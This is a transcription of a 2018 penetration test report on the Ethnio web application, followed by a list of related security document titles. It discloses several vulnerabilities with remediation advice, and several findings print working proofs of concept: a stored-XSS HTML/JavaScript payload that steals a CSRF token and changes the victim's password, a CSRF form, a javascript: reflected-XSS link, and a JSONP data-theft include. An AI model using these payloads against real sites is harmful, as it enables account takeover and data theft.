Penetration Test Report

Size: px
Start display at page:

Download "Penetration Test Report"

Transcription

1 Penetration Test Report Feb 12, 2018 Ethnio, Inc W SUNSET BLVD LOS angeles, CA Tel (888) ETHN.io

2 Summary This document contains the most recent pen test results from our third party provider, Include Security, as well as key findings from automated tools like Metasploit. The security of the Ethnio web application benefits from the use of the Ruby on Rails web application framework. No critical severity issues were discovered in the application, however several issues were discovered that represent significant risk. Ethnio is taking steps to remediate the specific issues discussed in this report, as well as keeping security in mind when writing future code, and implementing increasingly strict firewalls for the application servers. The Include Security assessment team has provided specific remediation suggestions that Ethnio can follow in each of the findings below. 9 Issues Found Each finding is assigned a unique number, sequential in the category, so H1, H2, H3, would all be high risk findings in order. Similarly, each medium risk finding is numbered M1, M2, etc. H = High Risk M = Medium Risk L = Low Risk I = Informational Only 1 Issue 2 Issues 6 Issues 0 Issues Disclaimer The information presented in this document is provided as is and without warranty. Pen tests are a point in time analysis and as such it is possible that something in the environment could have changed since the tests reflected in this report were run. Also, it is possible that new vulnerabilities may have been discovered since the tests were run. For this reason, this report should be considered a guide, not a 100% representation of the risk threatening your systems, networks and applications. Ethnio, Inc Page 2 of 11

3 H1 Persistent Cross-Site Scripting The Ethnio web application is vulnerable to persistent cross site scripting (XSS) due to weak restrictions on uploaded logo file types. This vulnerability can be used to change a victim's Ethnio password, and effectively steal their account. When creating a screener, a user may upload a logo image file. The image is uploaded in an HTTPS POST request to a URL similar to ethn.io/rest/screeners/9098/upload_logo. The Ethnio application does not restrict the types of files which can be uploaded. An attacker may therefore upload an HTML file containing malicious JavaScript. If the attacker can then cause a victim to browse to the HTML document kept on the server after the upload, the JavaScript code will run in the victim's browser in the context of the victim's Ethnio session. To demonstrate this vulnerability, the following proof-of-concept HTML document was created and uploaded by the free user tester8 using the image upload form at edit?step=setup:! <html> <head> <script> function a() { fdoc = document.getelementbyid("f").contentdocument; url = fdoc.location.protocol + "//" + fdoc.location.host + fdoc.body.innerhtml.match(/\/users\/[0-9]+\/edit/) document.getelementbyid("g").onload = function() {b();}; document.getelementbyid("g").src = url; } function b() { var gdoc = document.getelementbyid("g").contentdocument; var newpw = "newpassword9"; var authtoken = escape(gdoc.getelementsbyname("authenticity_token")[0].value); var body = "_method=put&authenticity_token=" + authtoken + "&user%5bpassword%5d=" + newpw + "&user%5bpassword_confirmation%5d=" + newpw + "&commit=save"; var r = new XMLHttpRequest(); r.open("post", url.replace("/edit",""), false); r.setrequestheader("content-type","application/x-www-form-urlencoded"); r.send(body); } </script> </head> <body> Test! <iframe id="f" src="../../rest/screeners" onload=a()></iframe> <iframe id="g"></iframe> </body> </html> Ethnio, Inc Page 3 of 11

4 This document uses JavaScript to identify the user logged in to Ethnio, steal their authenticity_token token, and use this information to perform a password change POST request. The exploit was triggered by a victim visiting the following URL, which refers to the uploaded HTML file, while logged in as a user: The malicious JavaScript code was executed, causing the following POST request to be made, changing a user's password:! POST /users/3932 HTTP/1.1 Host: beta.ethn.io Proxy-Connection: keep-alive Content-Length: 166 Origin: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/ (KHTML, like Gecko) Chrome/ Safari/ Content-type: application/x-www-form-urlencoded Accept: */* Referer: Accept-Encoding: gzip,deflate,sdch Accept-Language: en-us,en;q=0.8 Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.3 Cookie: ethnio_displayed=yes; utma= ; utmb= ; utmc= ; utmz= utmcsr=beta.ethn.io utmccn=(referral) utmcmd=referral ut mcct=/rest/dash; auth_token=e6e8318d73c8dfd b848f3b141b; _ethnio_session_id=bah7ctoqx2nzcmzfdg9rzw4imvdidufsslpbcuzwmedbdezauk9qslj2smfbewjkvytq VGVWNXpaVDg0TzA9Og9zZXNzaW9uX2lkIiU4NGViMGI1MWYyYTdhYzkwYmU0MTI2NzExM2M4MzAyMiIKZmxhc2h JQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoMdXNlcl9pZGkCXA8%3D f1be3af50fbffab5db0ca777892f8b1fd637 _method=put&authenticity_token=whuarjzaqfp0gatfzrojjrvjaaybdw+ptev5zzt84o0%3d&user%5bpa ssword%5d=newpassword9&user%5bpassword_confirmation%5d=newpassword9&commit=save! This finding is considered high risk because an attacker may use a free account on the Ethnio application to discover and exploit the vulnerability, which could result in the compromise of a victim's Ethnio account. To prevent this type of attack, the Ethnio application should strictly enforce the types of files that are uploaded as logos. Logo files should only be accepted if they match a list of image file types; if an uploaded logo file is not an image, it should not remain accessible from the server. Ethnio, Inc Page 4 of 11

5 M1 Anti-CSRF Token not being Verified During testing it was identified that the application did not verify the submitted anti-csrf token. If a user visits an attacker-controlled page on an external domain while logged in, then an attacker can issue a cross-site requests to take action the user s behalf. Such a request may either contain an additional XSS payload or simply change information such as the user's password. For example, by making a request to /rest/screeners, an attacker can add a new screener. HTML of a page demonstrating the issue: <form action= method=post id=attackform> <input name=screener[name] value="test csrf"> <input type=submit> </form> Result (a new screener by the name test csrf is added): Anti-CSRF tokens are generated and "used" throughout the application, but are not verified upon submission of form data. It is strongly recommended that the application is reconfigured to require valid anti-csrf tokens. Ethnio, Inc Page 5 of 11

6 M2 Password not Required for Password Change Request The password change workflow in the Ethnio web application does not request a user's old password in order to change the password. This means that an attacker could use a cross-site scripting vulnerability in the web application to change a victim's password. An example of this type of attack is demonstrated in finding H1. The password change logic does not require an anti cross-site request forgery token, so the password can be changed with a cross-site request forgery attack as demonstrated in finding M2. The application should request the old password at the same time as it requests the new password. This adds an additional layer of defense in the case that anti-csrf protection is non-functional (as is currently the case) or is bypassed in some manner. Ethnio, Inc Page 6 of 11

7 L1 Reflected Cross-Site Scripting The Ethnio application contains a reflected XSS vulnerability in the form that is used to set the text of screeners' title pages located at /screeners/set_screener_title_description/[screener ID number]. JavaScript code that is included in an HTML <a> tag as part of the value URL parameter will be returned in the response. Other HTML tags such as <script> tags are filtered from the response. This vulnerability is considered low risk because the attacker must know a valid screener ID for the victim and the victim must click a link to trigger the attack. To demonstrate this attack, the following URL was visited while logged in as a user: This resulted in the following HTTP response, containing the javascript: link: value=<a+href="javascript:alert(1)">click</a> HTTP/ OK Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) Set-Cookie: _ethnio_session_id=bah7ctoqx2nzcmzfdg9rzw4imstuzwhrb3fcv213tu5kmmiwnkfzntu2evfhwxbpmu 5V evjieujjc1jtyke9og9zzxnzaw9ux2lkiivjnwi0mmywzdkxowfmzmm0ndgzzte5zda3yznjztewyyikzmxhc 2h JQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiHExvZ2dlZCBpbiBzdWNj ZX NzZnVsbHkuBjoKQHVzZWR7BjsIVDoMdXNlcl9pZGkCXA8%3D-- f574a857715f92458de0fe14b9a11fd3c5a443ba; domain=.ethn.io; path=/; HttpOnly ETag: "e965c0c05c28f2c49bccc79992af538a" X-Runtime: 57 Cache-Control: private, max-age=0, must-revalidate Server: nginx/ Phusion Passenger (mod_rails/mod_rack) Content-Length: 39 <a href= javascript:alert(1)">click</a> Figure 1 shows that when the link is clicked, the JavaScript alert box is shown. The application does filtering of the input to prevent <script> and other HTML tags from being included in the response. Stricter checking should be done to ensure this type of attack is not possible. Ethnio, Inc Page 7 of 11

8 Figure 1: Result of XSS attack In order to better mitigate XSS attacks, the application should validate and properly HTML-escape all data before it is placed in a page to be returned to the user. A temporary mitigation can be accomplished with a network intermediary device such as Web Application Firewall. Alternatively input validation can be done to ensure the screener ID is only within the numeric range the application expects. Ethnio, Inc Page 8 of 11

9 L2 Username and Enumeration It is possible to enumerate the existence of usernames and addresses from the application by trying them against the register user functionality. An attacker may be able to use retrieved usernames and addresses to aid in a brute-force attack against other services, or in a social engineering attack. Valid applications credentials are not a prerequisite to abuse this functionality. The response is true - the address is not registered: GET /users/check_input? =this_ _is_not_used@includesecurity.com Host: ethn.io 200 OK Content-Length: 4 true The response is false - the address is already in use: GET /users/check_input? =this_ _is_not_used@includesecurity.com Host: ethn.io 200 OK Content-Length: 5 false If this particular privacy attribute of Ethnio users is of importance to the user-base then this feature should be removed as it allows an attacker to know if a particular address has an account on the application. Ethnio, Inc Page 9 of 11

10 L3 Unprotected JSONP The application exposes sensitive data in JSON/JSONP responses. Generally HTTP responses across the "Same Origin Policy" are not readable, but there are several exceptions to the rule. The most predominant examples are cross-domain loading of resources such as JavaScript and Cascading Style Sheets through the <script src=> and <style src=> tags. Responses to such resource requests are evaluated within the context/dom of the page issuing the requests, which in this instance enables a malicious page to read the contents of the exposed JSON. This may either leak sensitive information directly or lack data that is required for other attacks to be successful (CSRF or some instances of reflected XSS vulnerabilities) Response to a GET request to (the.js extension is added to tell the application we are expecting JSONP output): jquery("#name-9138").replacewith("\u003cform action=\"/rename/rename_screener/9138\" class=\"edit_screener\" id=\"edit_screener_9138\" method=\"post\" onsubmit=\"jquery.ajax({data:jquery.param(jquery(this).serializearray()) + '\u0026amp;authenticity_token=' + encodeuricomponent('b2k5ozd3y3ottulefiyvf/ druvl2jcjq6ijp1gobx38='), datatype:'script', type:'post', url:'/rename/ rename_screener/9138'}); return false;\"\u003e\u003cdiv style=\"margin:0;padding: 0;display:inline\"\u003E\u003Cinput name=\"_method\" type=\"hidden\" value=\"put\" / \u003e\u003cinput name=\"authenticity_token\" type=\"hidden\" value=\"b2k5ozd3y3ottulefiyvf/druvl2jcjq6ijp1gobx38=\" /\u003e\u003c/div\u003e\n \u003cinput id=\"edit_screener_name\" name=\"screener[name]\" size=\"30\" type=\"text\" value=\"test csrf\" /\u003e\n \u003cinput id=\"screener_submit\" name=\"commit\" type=\"submit\" value=\"update\" /\u003e\n\u003c/form\u003e"); By creating a malicious page and initializing the relevant functions ("jquery", "$", etc) the contents can read by including the exposed JSONP resource: <script src= This attack is commonly mitigated by requiring the web application to use a JSON parsing library and prefixing the returned data with a piece of code that will render a malicious <script> tag unable to load the data. A common way of implementing such a defense (used by Facebook, amongst others) is to prefix the data with a never-ending for loop: for(;;){} Ethnio, Inc Page 10 of 11

11 L4 Rubyzip outdated Ethnio currently uses rubyzip version It should be updated to or later Update L5 Loofah gem outdated Loofah gem is currently and should be updated to or later Update L6 Sprockets gem outdated The Sprockets gem is currently and should be or later Update Ethnio, Inc Page 11 of 11

Cross-Site Request Forgery in Cisco SG220 series

Cross-Site Request Forgery in Cisco SG220 series Cross-Site Request Forgery in Cisco SG220 series Security advisory 12/09/2016 Renaud Dubourguais Nicolas Collignon www.synacktiv.com 5 rue Sextius Michel 75015 Paris Vulnerability description The Cisco

More information

Common Websites Security Issues. Ziv Perry

Common Websites Security Issues. Ziv Perry Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP

More information

Introduction to HTTP. Jonathan Sillito

Introduction to HTTP. Jonathan Sillito Introduction to HTTP Jonathan Sillito If you interested in working with a professor next Summer 2011 apply for an NSERC Undergraduate Student Award. Students must have a GPA of 3.0 or higher to be eligible.

More information

Exploiting and Defending: Common Web Application Vulnerabilities

Exploiting and Defending: Common Web Application Vulnerabilities Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,

More information

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11 RBS-2018-004 NetGain Enterprise Manager Multiple Vulnerabilities 2018-03-22 1 of 11 Table of Contents Vendor / Product Information 3 Vulnerable Program Details 3 Credits 3 Impact 3 Vulnerability Details

More information

EasyCrypt passes an independent security audit

EasyCrypt passes an independent security audit July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored

More information

RKN 2015 Application Layer Short Summary

RKN 2015 Application Layer Short Summary RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,

More information

WEB SECURITY: XSS & CSRF

WEB SECURITY: XSS & CSRF WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often

More information

Web Security: Vulnerabilities & Attacks

Web Security: Vulnerabilities & Attacks Computer Security Course. Web Security: Vulnerabilities & Attacks Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack

More information

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam. Eleonora Petridou Pascal Cuylaerts System And Network Engineering University of Amsterdam June 30, 2011 Outline Research question About Perslink Approach Manual inspection Automated tests Vulnerabilities

More information

ethnio tm Technical Overview VERSION NO. 6 CREATED AUG 22, 2018 ETHNIO, INC W SUNSET BLVD LOS ANGELES, CA TEL (888)

ethnio tm Technical Overview VERSION NO. 6 CREATED AUG 22, 2018 ETHNIO, INC W SUNSET BLVD LOS ANGELES, CA TEL (888) ethnio tm Technical Overview VERSION NO. 6 CREATED AUG 22, 2018 ETHNIO, INC. 6121 W SUNSET BLVD LOS ANGELES, CA 90028 TEL (888) 879-7439 Summary Ethnio works by displaying a survey-like screener to your

More information

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication

More information

Cross Site Request Forgery

Cross Site Request Forgery Cross Site Request Forgery VULNERABILITY OVERVIEW WHITE PAPER PUBLIC Version: 1.0 By: Acadion Security URL: http://www.acadion.nl/ Date: February 6, 2013 Address: Koornmarkt 46 2611 EH Delft Nederland

More information

jquery Basic HTTP communication

jquery Basic HTTP communication jquery Basic HTTP communication TAMZ 1 Lab 5 See: http://api.jquery.com/jquery.get/ http://api.jquery.com/jquery.post/ Application deployment Application has to be uploaded to a server Using of FTP/SCP/SFTP

More information

Application vulnerabilities and defences

Application vulnerabilities and defences Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database

More information

ethnio tm IMPLEMENTATION GUIDE ETHNIO, INC W SUNSET BLVD LOS ANGELES, CA TEL (888) VERSION NO. 3 CREATED JUL 14, 2017

ethnio tm IMPLEMENTATION GUIDE ETHNIO, INC W SUNSET BLVD LOS ANGELES, CA TEL (888) VERSION NO. 3 CREATED JUL 14, 2017 ethnio tm IMPLEMENTATION GUIDE VERSION NO. 3 CREATED JUL 14, 2017 ETHNIO, INC. 6121 W SUNSET BLVD LOS ANGELES, CA 90028 TEL (888) 879-7439 SUMMARY Getting Ethnio working means placing one line of JavaScript

More information

Web basics: HTTP cookies

Web basics: HTTP cookies Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the

More information

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends

More information

Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability

Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 5 Secure Network - Security Research

More information

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised

More information

MWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents

MWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents Contents MWR InfoSecurity Security Advisory DotNetNuke Cross Site Request Forgery Vulnerability 2010-06-14 2010-06-14 Page 1 of 7 Contents Contents 1 Detailed Vulnerability Description... 4 1.1 Introduction...

More information

JOE WIPING OUT CSRF

JOE WIPING OUT CSRF JOE ROZNER @JROZNER WIPING OUT CSRF IT S 2017 WHAT IS CSRF? 4 WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS WHERE DOES CSRF COME FROM? LET S TALK HTTP SAFE VS. UNSAFE

More information

Security implications of the Cross-Origin Resource Sharing. Gergely Revay

Security implications of the Cross-Origin Resource Sharing. Gergely Revay Security implications of the Cross-Origin Resource Sharing Gergely Revay http://gerionsecurity.com @geri_revay Disclaimer This presentation is purely my opinion and not related to SIEMENS. https://c1.staticflickr.com/1/21/27423135_082e7b5983.jpg

More information

Web basics: HTTP cookies

Web basics: HTTP cookies Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the

More information

Web Security IV: Cross-Site Attacks

Web Security IV: Cross-Site Attacks 1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one

More information

CSC 482/582: Computer Security. Cross-Site Security

CSC 482/582: Computer Security. Cross-Site Security Cross-Site Security 8chan xss via html 5 storage ex http://arstechnica.com/security/2015/09/serious- imgur-bug-exploited-to-execute-worm-like-attack-on- 8chan-users/ Topics 1. Same Origin Policy 2. Credential

More information

JOE WIPING OUT CSRF

JOE WIPING OUT CSRF JOE ROZNER @JROZNER WIPING OUT CSRF IT S 2017 WHAT IS CSRF? 4 WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS WHERE DOES CSRF COME FROM? 6 SAFE VS. UNSAFE Safe GET HEAD

More information

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Narendra Bhati @NarendraBhatiB http://websecgeeks.com Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page

More information

Compliance with OWASP ASVS L1:

Compliance with OWASP ASVS L1: UnderDefense Application Security Audit for Client Compliance with OWASP ASVS L1: Failed June 15, 2017 Notice UnderDefense has made every reasonable attempt to ensure that the information contained within

More information

XSSFor the win! What can be really done with Cross-Site Scripting.

XSSFor the win! What can be really done with Cross-Site Scripting. XSSFor the win! What can be really done with Cross-Site Scripting by @brutelogic Whoami Security Researcher at Sucuri Security (a GoDaddy company) XSS, filter/waf bypass and bash! Helped to fix more than

More information

Content Security Policy

Content Security Policy About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training

More information

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren Security in a Mainframe Emulator Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren October 25, 2017 Table of Contents Introduction... 2 About this paper...

More information

HashCookies A Simple Recipe

HashCookies A Simple Recipe OWASP London Chapter - 21st May 2009 HashCookies A Simple Recipe Take a cookie Add some salt Add a sequence number John Fitzpatrick Full paper at http://labs.mwrinfosecurity.com Structure What are hashcookies

More information

Network Vulnerability Scan

Network Vulnerability Scan Network Vulnerability Scan Aug 28, 2018 Ethnio, Inc. 6121 W SUNSET BLVD LOS angeles, CA 90028 Tel (888) 879-7439 ETHN.io Summary Ethnio conducts ongoing network vulnerability scans using both Qualys and

More information

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS Quit MWR InfoSecurity Advisory Elastic Path Administrative Session Hijacking through Embedded XSS 26 th April 2007 2007-04-26 1 of 7 INDEX 1 Detailed Vulnerability description...4 1.1 Introduction...4

More information

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Computer Security 3e. Dieter Gollmann.  Chapter 18: 1 Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter

More information

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies CNIT 129S: Securing Web Applications Ch 3: Web Application Technologies HTTP Hypertext Transfer Protocol (HTTP) Connectionless protocol Client sends an HTTP request to a Web server Gets an HTTP response

More information

Chrome Extension Security Architecture

Chrome Extension Security Architecture Chrome Extension Security Architecture Presenter: Jienan Liu Network, Intelligence & security Lab outline Chrome extension introduction Threats towards extension Chrome extension s security architecture

More information

WHY CSRF WORKS. Implicit authentication by Web browsers

WHY CSRF WORKS. Implicit authentication by Web browsers WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication

More information

Executive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7

Executive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7 CANVAS by Instructure Bugcrowd Flex Program Results December 01 Executive Summary Bugcrowd Inc was engaged by Instructure to perform a Flex Bounty program, commonly known as a crowdsourced penetration

More information

C1: Define Security Requirements

C1: Define Security Requirements OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security

More information

Multi-Post XSRF Web App Exploitation, total pwnage

Multi-Post XSRF Web App Exploitation, total pwnage Multi-Post XSRF Web App Exploitation, total pwnage Adrien de Beaupré SANS ISC Handler Tester of pens Certified SANS Instructor Intru-Shun.ca Inc. SecTor 2015 Introduction Web application vulnerabilities.

More information

Lecture Overview. IN5290 Ethical Hacking

Lecture Overview. IN5290 Ethical Hacking Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp

More information

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp

More information

last time: command injection

last time: command injection Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string

More information

Web Application Security. Philippe Bogaerts

Web Application Security. Philippe Bogaerts Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security

More information

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Advanced Web Technology 10) XSS, CSRF and SQL Injection Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation

More information

HTTP Security Headers Explained

HTTP Security Headers Explained HTTP Security Headers Explained Scott Sauber Slides at scottsauber.com scottsauber Audience Anyone with a website Agenda What are HTTP Security Headers? Why do they matter? HSTS, XFO, XSS, CSP, CTO, RH,

More information

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are

More information

CSRF in the Modern Age

CSRF in the Modern Age CSRF in the Modern Age Sidestepping the CORS Standard Tanner Prynn @tannerprynn In This Talk The State of CSRF The CORS Standard How Not To Prevent CSRF The Fundamentals of HTTP Without cookies: With cookies:

More information

Lab 5: Web Attacks using Burp Suite

Lab 5: Web Attacks using Burp Suite Lab 5: Web Attacks using Burp Suite Aim The aim of this lab is to provide a foundation in performing security testing of web applications using Burp Suite and its various tools. Burp Suite and its tools

More information

CSE392/ISE331. Web Security Goals & Workings of the Web. Nick Nikiforakis

CSE392/ISE331. Web Security Goals & Workings of the Web. Nick Nikiforakis CSE392/ISE331 Web Security Goals & Workings of the Web Nick Nikiforakis nick@cs.stonybrook.edu Goals of Web Security Safely browse the Web A malicious website cannot steal information from or modify legitimate

More information

CS 355. Computer Networking. Wei Lu, Ph.D., P.Eng.

CS 355. Computer Networking. Wei Lu, Ph.D., P.Eng. CS 355 Computer Networking Wei Lu, Ph.D., P.Eng. Chapter 2: Application Layer Overview: Principles of network applications? Introduction to Wireshark Web and HTTP FTP Electronic Mail SMTP, POP3, IMAP DNS

More information

Web Security. Aggelos Kiayias Justin Neumann

Web Security. Aggelos Kiayias Justin Neumann Web Security Aggelos Kiayias Justin Neumann Dynamic HTML Umbrella term : HTML Javascript Cascading Style Sheets (CSS) Document Object Model (DOM) : a hierarchical structure API for accessing / manipulating

More information

Stopping Automated Application Attack Tools

Stopping Automated Application Attack Tools Stopping Automated Application Attack Tools Black Hat 2006 - Amsterdam March, 2006 Gunter Ollmann Director of X-Force Internet Security Systems Introduction Automated Attack Methods Common Protection Strategies

More information

ColdFusion Application Security: The Next Step - Handout

ColdFusion Application Security: The Next Step - Handout ColdFusion Application Security: The Next Step - Handout Jason Dean http://www.12robots.com Boston CFUG September 16 th, 2009 REQUEST FORGERIES A request forgery, also sometimes called a Cross-Site (or

More information

Combating Common Web App Authentication Threats

Combating Common Web App Authentication Threats Security PS Combating Common Web App Authentication Threats Bruce K. Marshall, CISSP, NSA-IAM Senior Security Consultant bmarshall@securityps.com Key Topics Key Presentation Topics Understanding Web App

More information

Neat tricks to bypass CSRF-protection. Mikhail

Neat tricks to bypass CSRF-protection. Mikhail Neat tricks to bypass CSRF-protection Mikhail Egorov @0ang3el About me AppSec Engineer @ Ingram Micro Cloud Bug hunter & Security researcher Conference speaker https://www.slideshare.net/0ang3el @0ang3el

More information

Your Turn to Hack the OWASP Top 10!

Your Turn to Hack the OWASP Top 10! OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application

More information

Preparing for the Cross Site Request Forgery Defense

Preparing for the Cross Site Request Forgery Defense Preparing for the Cross Site Request Forgery Defense By Chuck Willis chuck.willis@mandiant.com Presented at Black Hat Briefings DC 2008 on February 20, 2008 Slides available at www.blackhat.com. Abstract:

More information

A Server- and Browser-Transparent CSRF Defense for Web 2.0 Applications

A Server- and Browser-Transparent CSRF Defense for Web 2.0 Applications A Server- and Browser-Transparent CSRF Defense for Web 2.0 Applications Riccardo Pelizzi System Security Lab Department of Computer Science Stony Brook University December 8, 2011 1 / 18 Riccardo Pelizzi

More information

Web Attacks CMSC 414. September 25 & 27, 2017

Web Attacks CMSC 414. September 25 & 27, 2017 Web Attacks CMSC 414 September 25 & 27, 2017 Overview SQL Injection is frequently implemented as a web-based attack, but doesn t necessarily need to be There are a wide variety of web-based attacks Some

More information

Advanced CSRF and Stateless at OWASP AppSec Research 2012

Advanced CSRF and Stateless at OWASP AppSec Research 2012 Advanced CSRF and Stateless Anti-CSRF @johnwilander at OWASP AppSec Research 2012 Frontend developer at Svenska Handelsbanken Researcher in application security Co-leader OWASP Sweden @johnwilander johnwilander.com

More information

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018 HTB_WEBSECDOCS_v1.3.pdf Page 1 of 29 High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018 General Overview... 2 Meta-information... 4 HTTP Additional

More information

01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED

01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED 01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED Contents 1. Introduction 3 2. Security Testing Methodologies 3 2.1 Internet Footprint Assessment 4 2.2 Infrastructure Assessments

More information

Client Side Injection on Web Applications

